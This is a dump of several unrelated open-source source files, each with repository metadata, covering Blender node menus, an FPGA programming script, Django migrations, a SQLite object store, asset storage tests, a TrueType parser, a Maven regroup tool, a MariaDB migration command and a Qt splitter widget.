NodeItem("TextureNodeTexture"),
NodeItem("TextureNodeImage"),
NodeItem("NodeGroupInput", poll=group_input_output_item_poll),
]),
TextureNodeCategory("TEX_OUTPUT", "Output", items=[
NodeItem("TextureNodeOutput"),
NodeItem("TextureNodeViewer"),
NodeItem("NodeGroupOutput", poll=group_input_output_item_poll),
]),
TextureNodeCategory("TEX_OP_COLOR", "Color", items=[
NodeItem("TextureNodeMixRGB"),
NodeItem("TextureNodeCurveRGB"),
NodeItem("TextureNodeInvert"),
NodeItem("TextureNodeHueSaturation"),
NodeItem("TextureNodeCompose"),
NodeItem("TextureNodeDecompose"),
]),
TextureNodeCategory("TEX_PATTERN", "Pattern", items=[
NodeItem("TextureNodeChecker"),
NodeItem("TextureNodeBricks"),
]),
TextureNodeCategory("TEX_TEXTURE", "Textures", items=[
NodeItem("TextureNodeTexNoise"),
NodeItem("TextureNodeTexDistNoise"),
NodeItem("TextureNodeTexClouds"),
NodeItem("TextureNodeTexBlend"),
NodeItem("TextureNodeTexVoronoi"),
NodeItem("TextureNodeTexMagic"),
NodeItem("TextureNodeTexMarble"),
NodeItem("TextureNodeTexWood"),
NodeItem("TextureNodeTexMusgrave"),
NodeItem("TextureNodeTexStucci"),
]),
TextureNodeCategory("TEX_CONVERTOR", "Converter", items=[
NodeItem("TextureNodeMath"),
NodeItem("TextureNodeValToRGB"),
NodeItem("TextureNodeRGBToBW"),
NodeItem("TextureNodeValToNor"),
NodeItem("TextureNodeDistance"),
]),
TextureNodeCategory("TEX_DISTORT", "Distort", items=[
NodeItem("TextureNodeScale"),
NodeItem("TextureNodeTranslate"),
NodeItem("TextureNodeRotate"),
NodeItem("TextureNodeAt"),
]),
TextureNodeCategory("TEX_GROUP", "Group", items=node_group_items),
TextureNodeCategory("TEX_LAYOUT", "Layout", items=[
NodeItem("NodeFrame"),
NodeItem("NodeReroute"),
]),
]
def register():
nodeitems_utils.register_node_categories('SHADER', shader_node_categories)
nodeitems_utils.register_node_categories('COMPOSITING', compositor_node_categories)
nodeitems_utils.register_node_categories('TEXTURE', texture_node_categories)
def unregister():
nodeitems_utils.unregister_node_categories('SHADER')
nodeitems_utils.unregister_node_categories('COMPOSITING')
nodeitems_utils.unregister_node_categories('TEXTURE')
if __name__ == "__main__":
register()
| gpl-3.0 | 7,506,633,246,367,762,000 | 38.014374 | 98 | 0.667632 | false |
ska-sa/casperfpga | scripts/casperfpga_program.py | 1 | 1087 | #!/usr/bin/env python
__author__ = 'paulp'
import argparse
from casperfpga.casperfpga import CasperFpga
parser = argparse.ArgumentParser(
description='Program an FPGA.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(dest='hostname', type=str, action='store',
help='the hostname of the FPGA')
parser.add_argument(dest='fpgfile', type=str, action='store',
help='the FPG file to program')
parser.add_argument('--loglevel', dest='log_level', action='store', default='',
help='log level to use, default None, options INFO, '
'DEBUG, ERROR')
args = parser.parse_args()
if args.log_level != '':
import logging
log_level = args.log_level.strip()
try:
logging.basicConfig(level=eval('logging.%s' % log_level))
except AttributeError:
raise RuntimeError('No such log level: %s' % log_level)
# create the device and connect to it
fpga = CasperFpga(args.hostname, 7147)
fpga.upload_to_ram_and_program(args.fpgfile)
fpga.disconnect()
# end
| gpl-2.0 | -8,250,994,456,271,240,000 | 31.939394 | 79 | 0.658694 | false |
chmarr/prequelprizes | prizes/migrations/0002_auto__add_field_winner_authentication_ip__add_field_winner_details_ip.py | 1 | 2807 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Winner.authentication_ip'
db.add_column('prizes_winner', 'authentication_ip',
self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True),
keep_default=False)
# Adding field 'Winner.details_ip'
db.add_column('prizes_winner', 'details_ip',
self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Winner.authentication_ip'
db.delete_column('prizes_winner', 'authentication_ip')
# Deleting field 'Winner.details_ip'
db.delete_column('prizes_winner', 'details_ip')
models = {
'prizes.winner': {
'Meta': {'object_name': 'Winner'},
'address1': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'address2': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'authentication_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'authentication_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'creation_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'details_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'details_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '80', 'blank': 'True'})
}
}
complete_apps = ['prizes'] | gpl-2.0 | -1,932,945,504,593,230,000 | 53 | 135 | 0.566441 | false |
gpodder/gpodder | src/gpodder/minidb.py | 1 | 7563 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# gPodder - A media aggregator and podcast client
# Copyright (c) 2005-2018 The gPodder Team
#
# gPodder is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# gPodder is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# gpodder.minidb - A simple SQLite store for Python objects
# Thomas Perl, 2010-01-28
# based on: "ORM wie eine Kirchenmaus - a very poor ORM implementation
# by thp, 2009-11-29 (thp.io/about)"
# This module is also available separately at:
# http://thp.io/2010/minidb/
# For Python 2.5, we need to request the "with" statement
try:
import sqlite3.dbapi2 as sqlite
except ImportError:
try:
from pysqlite2 import dbapi2 as sqlite
except ImportError:
raise Exception('Please install SQLite3 support.')
import threading
class Store(object):
def __init__(self, filename=':memory:'):
self.db = sqlite.connect(filename, check_same_thread=False)
self.lock = threading.RLock()
def _schema(self, class_):
return class_.__name__, list(sorted(class_.__slots__))
def _set(self, o, slot, value):
# Set a slot on the given object to value, doing a cast if
# necessary. The value None is special-cased and never cast.
cls = o.__class__.__slots__[slot]
if value is not None:
if isinstance(value, bytes):
value = value.decode('utf-8')
value = cls(value)
setattr(o, slot, value)
def commit(self):
with self.lock:
self.db.commit()
def close(self):
with self.lock:
self.db.isolation_level = None
self.db.execute('VACUUM')
self.db.isolation_level = ''
self.db.close()
def _register(self, class_):
with self.lock:
table, slots = self._schema(class_)
cur = self.db.execute('PRAGMA table_info(%s)' % table)
available = cur.fetchall()
if available:
available = [row[1] for row in available]
missing_slots = (s for s in slots if s not in available)
for slot in missing_slots:
self.db.execute('ALTER TABLE %s ADD COLUMN %s TEXT' % (table,
slot))
else:
self.db.execute('CREATE TABLE %s (%s)' % (table,
', '.join('%s TEXT' % s for s in slots)))
def convert(self, v):
if isinstance(v, str):
return v
elif isinstance(v, str):
# XXX: Rewrite ^^^ as "isinstance(v, bytes)" in Python 3
return v.decode('utf-8')
else:
return str(v)
def update(self, o, **kwargs):
self.remove(o)
for k, v in list(kwargs.items()):
setattr(o, k, v)
self.save(o)
def save(self, o):
if hasattr(o, '__iter__'):
klass = None
for child in o:
if klass is None:
klass = child.__class__
self._register(klass)
table, slots = self._schema(klass)
if not isinstance(child, klass):
raise ValueError('Only one type of object allowed')
used = [s for s in slots if getattr(child, s, None) is not None]
values = [self.convert(getattr(child, slot)) for slot in used]
self.db.execute('INSERT INTO %s (%s) VALUES (%s)' % (table,
', '.join(used), ', '.join('?' * len(used))), values)
return
with self.lock:
self._register(o.__class__)
table, slots = self._schema(o.__class__)
values = [self.convert(getattr(o, slot)) for slot in slots]
self.db.execute('INSERT INTO %s (%s) VALUES (%s)' % (table,
', '.join(slots), ', '.join('?' * len(slots))), values)
def delete(self, class_, **kwargs):
with self.lock:
self._register(class_)
table, slots = self._schema(class_)
sql = 'DELETE FROM %s' % (table,)
if kwargs:
sql += ' WHERE %s' % (' AND '.join('%s=?' % k for k in kwargs))
try:
self.db.execute(sql, list(kwargs.values()))
return True
except Exception as e:
return False
def remove(self, o):
if hasattr(o, '__iter__'):
for child in o:
self.remove(child)
return
with self.lock:
self._register(o.__class__)
table, slots = self._schema(o.__class__)
# Use "None" as wildcard selector in remove actions
slots = [s for s in slots if getattr(o, s, None) is not None]
values = [self.convert(getattr(o, slot)) for slot in slots]
self.db.execute('DELETE FROM %s WHERE %s' % (table,
' AND '.join('%s=?' % s for s in slots)), values)
def load(self, class_, **kwargs):
with self.lock:
self._register(class_)
table, slots = self._schema(class_)
sql = 'SELECT %s FROM %s' % (', '.join(slots), table)
if kwargs:
sql += ' WHERE %s' % (' AND '.join('%s=?' % k for k in kwargs))
try:
cur = self.db.execute(sql, list(kwargs.values()))
except Exception as e:
raise
def apply(row):
o = class_.__new__(class_)
for attr, value in zip(slots, row):
try:
self._set(o, attr, value)
except ValueError as ve:
return None
return o
return [x for x in [apply(row) for row in cur] if x is not None]
def get(self, class_, **kwargs):
result = self.load(class_, **kwargs)
if result:
return result[0]
else:
return None
if __name__ == '__main__':
class Person(object):
__slots__ = {'username': str, 'id': int}
def __init__(self, username, id):
self.username = username
self.id = id
def __repr__(self):
return '<Person "%s" (%d)>' % (self.username, self.id)
m = Store()
m.save(Person('User %d' % x, x * 20) for x in range(50))
p = m.get(Person, id=200)
print(p)
m.remove(p)
p = m.get(Person, id=200)
# Remove some persons again (deletion by value!)
m.remove(Person('User %d' % x, x * 20) for x in range(40))
class Person(object):
__slots__ = {'username': str, 'id': int, 'mail': str}
def __init__(self, username, id, mail):
self.username = username
self.id = id
self.mail = mail
def __repr__(self):
return '<Person "%s" (%s)>' % (self.username, self.mail)
# A schema update takes place here
m.save(Person('User %d' % x, x * 20, 'user@home.com') for x in range(50))
print(m.load(Person))
| gpl-3.0 | 1,007,703,415,363,267,500 | 32.317181 | 81 | 0.526907 | false |
neoden/lagring | test/test.py | 1 | 6253 | import os
import pytest
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
INSTANCE_ROOT = ''
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://lagring:lagring@localhost:5432/lagring_test'
app.config['ASSET_STORAGE_ROOT'] = os.path.join(os.getcwd(), 'test/var/assets')
app.config['ASSET_URL_ROOT'] = '/assets'
db = SQLAlchemy(app)
core = None
entity_base = None
model = None
instance = None
storage = None
IMAGE_PATH = os.path.join(INSTANCE_ROOT, 'test/data/image.jpg')
DIR_PATH = os.path.join(INSTANCE_ROOT, 'test/data')
def test_core():
from lagring import LagringCore
global core
core = LagringCore(os.path.join(INSTANCE_ROOT, app.config['ASSET_STORAGE_ROOT']))
def test_model_definition():
from lagring import Entity, Asset
global entity_base
entity_base = Entity
entity_base.bind(core)
class A(db.Model, entity_base):
__tablename__ = 'test'
id = db.Column(db.Integer(), primary_key=True)
image = Asset()
directory = Asset()
global model
model = A
def test_entity_type():
from lagring import Entity, Asset
class B(db.Model, Entity):
__entitytype__ = 'special'
__tablename__ = 'regular'
id = db.Column(db.Integer(), primary_key=True)
image = Asset()
assert(B.entity_type == 'special')
def test_none_asset():
with app.app_context():
a = model(id=1)
assert(not a.image)
assert(not a.image.abs_path)
global instance
instance = a
def test_entity_id():
assert(instance.entity_id == 1)
def test_write_to_model_field():
with app.app_context():
instance.image = IMAGE_PATH
def test_get_path_from_model():
with app.app_context():
assert(os.path.isfile(instance.image.abs_path))
def test_write_metadata():
with app.app_context():
instance.image = IMAGE_PATH, {'width': 100, 'height': 80}
assert(instance.image.width == 100)
assert(instance.image.height == 80)
def test_write_stream():
with app.app_context():
instance.image = open(IMAGE_PATH, 'rb')
assert(os.path.isfile(instance.image.abs_path))
def test_delete_asset():
from lagring.asset import NoneAssetInstance
path = instance.image.abs_path
del instance.image
assert(isinstance(instance.image, NoneAssetInstance))
def test_write_directory():
with app.app_context():
instance.directory = DIR_PATH
assert(os.path.isdir(instance.directory.abs_path))
def test_iterassets():
with app.app_context():
instance.image = IMAGE_PATH
instance.directory = DIR_PATH
n = 0
assets = []
for asset, name in instance.iterassets():
n += 1
assets.append((asset, name))
assert(
os.path.isfile(asset.abs_path)
or
os.path.isdir(asset.abs_path)
)
assert(assets[0][1] in ('image', 'directory'))
assert(assets[1][1] in ('image', 'directory'))
assert(assets[0][1] != assets[1][1])
def test_flask_lagring():
from lagring import FlaskLagring
global storage
storage = FlaskLagring()
storage.init_app(app)
def test_image_asset_def():
from lagring.assets.image import ImageAsset
class D(db.Model, storage.Entity):
__tablename__ = 'test2'
id = db.Column(db.Integer(), primary_key=True)
image = ImageAsset(size=(100, 100))
image_no_process = ImageAsset()
global model
model = D
def test_image_asset():
with app.app_context():
a = model(id=1)
assert(not a.image)
assert(not a.image.abs_path)
global instance
instance = a
def test_image_no_process():
with app.app_context():
instance.image_no_process = IMAGE_PATH
assert(os.path.isfile(instance.image_no_process.abs_path))
def test_image_asset_write():
with app.app_context():
instance.image = IMAGE_PATH
assert(os.path.isfile(instance.image.abs_path))
assert(instance.image.width == 100)
assert(instance.image.height == 100)
def test_clone_assets():
a = model(id=1)
b = model(id=2)
a.image = IMAGE_PATH
storage.clone_assets(a, b)
assert(os.path.isfile(a.image.abs_path))
assert(os.path.isfile(b.image.abs_path))
def test_directory_asset_def():
from lagring.assets.directory import DirectoryAsset
class E(db.Model, storage.Entity):
__tablename__ = 'test3'
id = db.Column(db.Integer(), primary_key=True)
directory = DirectoryAsset()
global model
model = E
def test_directory_asset():
with app.app_context():
a = model(id=1)
assert(not a.directory)
assert(not a.directory.abs_path)
global instance
instance = a
def test_directory_asset_write_directory():
with app.app_context():
instance.directory = os.path.join(DIR_PATH, 'directory_asset')
assert(os.path.isdir(instance.directory.abs_path))
assert(os.path.isfile(os.path.join(instance.directory.abs_path, 'image.jpg')))
def test_directory_asset_write_zip():
with app.app_context():
b = model(id=2)
b.directory = os.path.join(DIR_PATH, 'image.jpg.zip')
assert(os.path.isdir(instance.directory.abs_path))
assert(os.path.isfile(os.path.join(instance.directory.abs_path, 'image.jpg')))
def test_directory_asset_write_invalid_zip():
from lagring import StorageException
with pytest.raises(StorageException) as excinfo:
with app.app_context():
c = model(id=3)
c.directory = os.path.join(DIR_PATH, 'image.jpg')
assert 'Valid zip-archive expected' in str(excinfo.value)
def test_directory_asset_write_zip_from_stream():
from werkzeug.datastructures import FileStorage
with app.app_context():
d = model(id=4)
with open(os.path.join(DIR_PATH, 'image.jpg.zip'), 'rb') as stream:
d.directory = FileStorage(stream, 'image.jpg.zip')
assert (os.path.isdir(instance.directory.abs_path))
assert (os.path.isfile(os.path.join(instance.directory.abs_path, 'image.jpg')))
| mit | 1,610,468,995,106,834,400 | 23.715415 | 98 | 0.629778 | false |
brechtm/rinohtype | src/rinoh/font/opentype/truetype.py | 1 | 1902 | # This file is part of rinohtype, the Python document preparation system.
#
# Copyright (c) Brecht Machiels.
#
# Use of this source code is subject to the terms of the GNU Affero General
# Public License v3. See the LICENSE file or http://www.gnu.org/licenses/.
import struct
from .parse import OpenTypeTable, MultiFormatTable, short
class GlyfTable(OpenTypeTable):
"""Glyph outline table"""
tag = 'glyf'
def __init__(self, file, file_offset, loca_table):
super().__init__(file, file_offset)
self._file_offset = file_offset
for index, glyph_offset in enumerate(loca_table.offsets()):
if glyph_offset is not None:
self[index] = GlyphHeader(file, file_offset + glyph_offset)
# the glyph header is followed by the glyph description
class GlyphHeader(OpenTypeTable):
entries = [('numberOfContours', short),
('xMin', short),
('yMin', short),
('xMax', short),
('yMax', short)]
@property
def bounding_box(self):
return (self['xMin'], self['yMin'], self['xMax'], self['yMax'])
class LocaTable(OpenTypeTable):
"""Glyph location table"""
tag = 'loca'
def __init__(self, file, file_offset, version, num_glyphs):
super().__init__(file, file_offset)
self._num_glyphs = num_glyphs
data_format = 'L' if version == 1 else 'H'
data_struct = struct.Struct('>{}{}'.format(num_glyphs + 1, data_format))
self._offsets = data_struct.unpack(file.read(data_struct.size))
if version == 0:
self._offsets = [offset * 2 for offset in self._offsets]
def offsets(self):
for index in range(self._num_glyphs):
offset = self._offsets[index]
if offset != self._offsets[index + 1]:
yield offset
else:
yield None
| agpl-3.0 | 1,037,244,954,149,980,400 | 31.793103 | 80 | 0.593586 | false |
pablooliveira/tigergrader | tigergrader/tests/test_plagiarism.py | 1 | 1342 | import unittest
import os
import shutil
from tigergrader.initdb import create_user
from testhelper import TestHelper
class PlagiarismTestCases(TestHelper):
def setUp(self):
TestHelper.setUp(self)
create_user('admin', 'admin@example.com', 'admintiger')
create_user('user1', 'user@example.com', 'usertiger')
create_user('user2', 'user@example.com', 'usertiger')
self.activate_submission("T1")
self.grade("jtiger-src.zip", "T1", user="user1")
self.grade("jtiger-src.zip", "T1", user="user2")
def test_plagiarism(self):
self.login('admin', 'admintiger')
rv = self.app.get('/admin', follow_redirects=True)
assert "3.0" in rv.data
assert "user1" in rv.data
assert "user2" in rv.data
rv = self.app.get('/plagiarism/T1', follow_redirects=True)
assert "user1" in rv.data
assert "user2" in rv.data
assert "/compare/T1/jtiger-src.zip/jtiger-src.zip/" in rv.data
rv = self.app.get('/compare/T1/jtiger-src.zip/jtiger-src.zip/',
follow_redirects=True)
assert "package jtiger.lexer" in rv.data
rv = self.app.get('/plagiarism/TWRONG', follow_redirects=True)
assert "Module does not seem to exist" in rv.data
if __name__ == '__main__':
unittest.main()
| mit | 8,271,417,888,378,298,000 | 32.55 | 71 | 0.622951 | false |
bjuvensjo/scripts | vang/maven/regroup.py | 1 | 2765 | #!/usr/bin/env python3
import argparse
from os import walk, rename, makedirs, listdir, rmdir
from os.path import join, sep
from sys import argv
from typing import Iterable, Callable
from vang.pio.rsr import _replace_in_file, _in
def file_content_replace_function(line: str, old: str, new: str) -> str:
line = line.replace(old, new)
line = line.replace(old.replace('.', sep), new.replace('.', sep))
# line = line.replace(f'<groupId>{old}</groupId>', f'<groupId>{new}</groupId>')
# line = line.replace(f'"{old}', f'"{new}')
# line = line.replace('{' + old, '{' + new)
# line = line.replace('<' + old, '<' + new)
# line = line.replace('=' + old, '=' + new)
# line = line.replace("='" + old, "='" + new)
# line = line.replace(old.replace('.', sep), new.replace('.', sep))
# line = sub(f'^package +{old}', f'package {new}', line)
# line = sub(f'^import +{old}', f'import {new}', line)
# line = sub(f'^import +static +{old}', f'import static {new}', line)
return line
def file_path_replace_function(file: str, old: str, new: str) -> str:
return file.replace(old.replace('.', sep), new.replace('.', sep))
def _replace_file(old: str, new: str, path: str, file: str, replace_function: Callable[[str, str, str], str]) -> None:
new_path = replace_function(path, old, new)
if new_path != path:
makedirs(new_path, exist_ok=True)
rename(join(path, file), join(new_path, file))
def _regroup(root: str, excludes: Iterable[str], old: str, new: str) -> None:
for dir_path, dir_names, files in walk(root, False):
if not any(_in(d, excludes) for d in dir_path.split(sep)):
for file in files:
if not _in(file, excludes):
_replace_in_file(old, new, join(dir_path, file), file_content_replace_function)
_replace_file(old, new, dir_path, file, file_path_replace_function)
for dir_name in dir_names:
if not listdir(join(dir_path, dir_name)):
rmdir(join(dir_path, dir_name))
def regroup(old: str, new: str, dirs: Iterable[str]) -> None:
for d in dirs:
_regroup(d, ['.git', '.gitignore', 'target'], old, new)
def main(old: str, new: str, dirs: Iterable[str]) -> None:
regroup(old, new, dirs)
def parse_args(args):
parser = argparse.ArgumentParser(
description='Change group for maven module, including package, all its imports and path references')
parser.add_argument('old', help='old group')
parser.add_argument('new', help='new group')
parser.add_argument('-d', '--dirs', nargs='*', default=['.'])
return parser.parse_args(args)
if __name__ == '__main__': # pragma: no cover
main(**parse_args(argv[1:]).__dict__)
| apache-2.0 | 4,013,461,642,139,699,700 | 37.943662 | 118 | 0.600723 | false |
rjdp/Easynginedemoplugin | ee/cli/plugins/stack_migrate.py | 1 | 5213 | from cement.core.controller import CementBaseController, expose
from cement.core import handler, hook
from ee.core.mysql import EEMysql
from ee.core.logging import Log
from ee.core.variables import EEVariables
from ee.core.aptget import EEAptGet
from ee.core.shellexec import EEShellExec
from ee.core.apt_repo import EERepo
from ee.core.services import EEService
import configparser
import os
class EEStackMigrateController(CementBaseController):
class Meta:
label = 'migrate'
stacked_on = 'stack'
stacked_type = 'nested'
description = ('Migrate stack safely')
arguments = [
(['--mariadb'],
dict(help="Migrate database to MariaDB",
action='store_true')),
# (['--PHP'],
# dict(help="update to html site", action='store_true')),
]
@expose(hide=True)
def migrate_mariadb(self):
# Backup all database
EEMysql.backupAll(self)
# Add MariaDB repo
Log.info(self, "Adding repository for MariaDB, please wait ...")
mysql_pref = ("Package: *\nPin: origin mirror.aarnet.edu.au"
"\nPin-Priority: 1000\n")
with open('/etc/apt/preferences.d/'
'MariaDB.pref', 'w') as mysql_pref_file:
mysql_pref_file.write(mysql_pref)
EERepo.add(self, repo_url=EEVariables.ee_mysql_repo)
Log.debug(self, 'Adding key for {0}'
.format(EEVariables.ee_mysql_repo))
EERepo.add_key(self, '0xcbcb082a1bb943db',
keyserver="keyserver.ubuntu.com")
config = configparser.ConfigParser()
config.read(os.path.expanduser("~")+'/.my.cnf')
try:
chars = config['client']['password']
except Exception as e:
Log.error(self, "Error: process exited with error %s"
% e)
Log.debug(self, "Pre-seeding MariaDB")
Log.debug(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password "
"password \" | "
"debconf-set-selections")
EEShellExec.cmd_exec(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password "
"password {chars}\" | "
"debconf-set-selections"
.format(chars=chars),
log=False)
Log.debug(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password_again "
"password \" | "
"debconf-set-selections")
EEShellExec.cmd_exec(self, "echo \"mariadb-server-10.0 "
"mysql-server/root_password_again "
"password {chars}\" | "
"debconf-set-selections"
.format(chars=chars),
log=False)
# Install MariaDB
apt_packages = EEVariables.ee_mysql
# If PHP is installed then install php5-mysql
if EEAptGet.is_installed(self, "php5-fpm"):
apt_packages = apt_packages + ["php5-mysql"]
# If mail server is installed then install dovecot-sql and postfix-sql
if EEAptGet.is_installed(self, "dovecot-core"):
apt_packages = apt_packages + ["dovecot-mysql", "postfix-mysql",
"libclass-dbi-mysql-perl"]
Log.info(self, "Updating apt-cache, please wait ...")
EEAptGet.update(self)
Log.info(self, "Installing MariaDB, please wait ...")
EEAptGet.remove(self, ["mysql-common", "libmysqlclient18"])
EEAptGet.auto_remove(self)
EEAptGet.install(self, apt_packages)
# Restart dovecot and postfix if installed
if EEAptGet.is_installed(self, "dovecot-core"):
EEService.restart_service(self, 'dovecot')
EEService.restart_service(self, 'postfix')
@expose(hide=True)
def default(self):
if ((not self.app.pargs.mariadb)):
self.app.args.print_help()
if self.app.pargs.mariadb:
if EEVariables.ee_mysql_host is not "localhost":
Log.error(self, "Remote MySQL found, EasyEngine will not "
"install MariaDB")
if EEShellExec.cmd_exec(self, "mysqladmin ping") and (not
EEAptGet.is_installed(self, 'mariadb-server')):
Log.info(self, "If your database size is big, "
"migration may take some time.")
Log.info(self, "During migration non nginx-cached parts of "
"your site may remain down")
start_migrate = input("Type \"mariadb\" to continue:")
if start_migrate != "mariadb":
Log.error(self, "Not starting migration")
self.migrate_mariadb()
else:
Log.error(self, "Your current MySQL is not alive or "
"you allready installed MariaDB")
| mit | 3,222,771,789,004,413,400 | 41.040323 | 78 | 0.536735 | false |
FrodeSolheim/fs-uae-launcher | fswidgets/splitter.py | 1 | 4453 | import traceback
import weakref
from typing import List, Optional, cast
from typing_extensions import Literal
import fsui
from fsbc.util import unused
from fsui import Widget
from fsui.common.layout import HorizontalLayout, Layout, VerticalLayout
from fsui.qt.color import Color
from fsui.qt.drawingcontext import DrawingContext
from fsui.qt.qparent import QParent
from fsui.qt.qt import QPainter, Qt, QWidget
from fswidgets.overrides import overrides
from fswidgets.parentstack import ParentStack
from fswidgets.qt.core import Qt
from fswidgets.qt.widgets import QSplitter
from fswidgets.style import Style
from fswidgets.widget import Widget
from launcher.fswidgets2.style import Style
class Splitter(Widget):
HORIZONTAL = "HORIZONTAL"
VERTICAL = "VERTICAL"
def __init__(
self,
orientation: Literal["HORIZONTAL", "VERTICAL"] = HORIZONTAL,
*,
parent: Optional[Widget] = None
):
# __children Must be initialized early, because get_min_size can be
# called via the super constructor.
self.__children: List[Widget] = []
parent = parent or ParentStack.top()
super().__init__(
parent,
qwidget=QSplitter(
Qt.Horizontal
if orientation == self.HORIZONTAL
else Qt.Vertical,
QParent(parent),
),
)
# self.style = Style({}, style)
self.style = Style({})
self.layout = None
self.qwidget.setHandleWidth(0)
self.qwidget.setChildrenCollapsible(False)
if parent.layout is not None:
parent.layout.add(self, fill=True, expand=True)
self.__fixedIndex = 0
self.__horizontal = orientation == Splitter.HORIZONTAL
# FIXME: Implement
def get_min_height(self, width: int) -> int:
minHeight = 0
for child in self.__children:
if self.__horizontal:
minHeight = max(minHeight, child.get_min_height(width))
else:
minHeight += child.get_min_height(width)
return minHeight
# FIXME: Implement
def get_min_width(self) -> int:
# return super().get_min_width()
# return 100
minWidth = 0
for child in self.__children:
if self.__horizontal:
minWidth += child.get_min_width()
else:
minWidth = max(minWidth, child.get_min_width())
return minWidth
def getSplitterPosition(self):
sizes = self.qwidget.sizes()
if self.__fixedIndex == 0:
return sizes[0]
else:
return -sizes[1]
@overrides
def onChildAdded(self, widget: Widget):
super().onChildAdded(widget)
print("Splitter.onChildAdded", widget)
self.__children.append(widget)
# if len(self.__children) == 2:
# sizes: List[int] = []
# for child in self.__children:
# if self.__horizontal:
# sizes.append(child.get_min_width())
# print("setSizes", sizes)
# self.qwidget.setSizes(sizes)
@overrides
def onQWidgetChildAdded(self, qwidget: QWidget):
print("Splitter.onQWidgetChildAdded", qwidget)
def on_resize(self):
super().on_resize()
# FIXME: If the splitter is resized so that there is not room for the
# minimum size of one of the widgets, move the splitter position to
# account for this
pass
@property
def qwidget(self) -> QSplitter:
return cast(QSplitter, self.getQWidget())
def setSplitterPosition(self, position: int, zeroableIndex: int = 0):
if position > 0:
self.qwidget.setStretchFactor(0, 0)
self.qwidget.setStretchFactor(1, 1)
self.qwidget.setSizes([position, 0])
self.__fixedIndex = 1
elif position < 0:
self.qwidget.setStretchFactor(0, 1)
self.qwidget.setStretchFactor(1, 0)
self.qwidget.setSizes([0, -position])
self.__fixedIndex = 0
else:
self.qwidget.setStretchFactor(zeroableIndex, 0)
self.qwidget.setStretchFactor(not zeroableIndex, 1)
self.qwidget.setSizes([0, 0])
self.__fixedIndex = zeroableIndex
def setStretchFactor(self, index: int, stretchFactor: int):
self.qwidget.setStretchFactor(index, stretchFactor)
| gpl-2.0 | -2,767,218,321,864,412,000 | 31.985185 | 77 | 0.608803 | false |
cezarfx/zorba | swig/python/tests/test04.py | 1 | 1089 | # Copyright 2006-2011 The FLWOR Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '@pythonPath@')
import zorba_api
def test(zorba):
#Read and write result
print 'Executing: test04.xq'
f = open('test04.xq', 'r')
lines = f.read()
f.close()
xquery = zorba.compileQuery(lines)
result = xquery.execute()
print result
return
store = zorba_api.InMemoryStore_getInstance()
zorba = zorba_api.Zorba_getInstance(store)
print "Running: XQuery execute"
test(zorba)
print "Success"
zorba.shutdown()
zorba_api.InMemoryStore_shutdown(store)
| apache-2.0 | -5,153,413,378,839,610,000 | 24.928571 | 74 | 0.741965 | false |
EmanueleCannizzaro/scons | test/DVIPDF/makeindex.py | 1 | 2303 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
